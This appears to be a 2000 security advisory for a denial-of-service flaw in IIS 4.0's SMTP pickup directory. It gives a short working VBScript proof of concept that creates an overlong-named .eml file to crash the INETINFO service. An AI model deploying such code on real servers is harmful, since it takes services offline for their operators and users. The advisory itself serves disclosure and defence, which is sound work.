IIS 4 Denial of Service

 
IIS 4 Denial of Service

Reported February 20, 2000 by valentijn
VERSIONS AFFECTED
Internet Information Server 4.0 on NT 4.0 with STMP Service installed

DESCRIPTION

It is possible to cause a denial of service condition against IIS by manipulating file names within the SMTP service"s directory structure. By creating a file name of more than 85 characters in length within the "\mailroot\pickup" directory, the mail server will generate an error and crash the INETINFO service, which supports IIS.

In addition, as long as the file remains in place IIS cannot start up properly. To restore service the file must be removed.

DEMONSTRATION

This demonstration code runs on the server side, which means you need a means to get the code on the server to begin with. This may imply a rather low risk since its hard to get foreign code on to a remote server, but consider a scenario that involves an ISP that  routinely allows ASP code to be installed on private sites.

<script>
" PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"

Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
  Thefile.writeline "X-Sender: [email protected]"
  Thefile.writeline "X-Receiver: [email protected]"
  Thefile.writeline "From: <[email protected]>"
  Thefile.writeline "To: <[email protected]>"
  Thefile.writeline "Subject: MINE DID NOT CRASH"
  Thefile.writeline "Date: " & now()
  Thefile.writeline "X-Generator: " & Thename
  Thefile.close
Set thefile = nothing
  Thename = ""

Function Createkey
for z = 1 to 80
   randomize
   a = Int((25 * Rnd) + 1)
   password = password & chr(a+65)
next
Createkey = password
end function

</script>

VENDOR RESPONSE

Microsoft is aware of this issue, however no comment was available at the time of this writing.

CREDITS
Discovered by valentijn

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish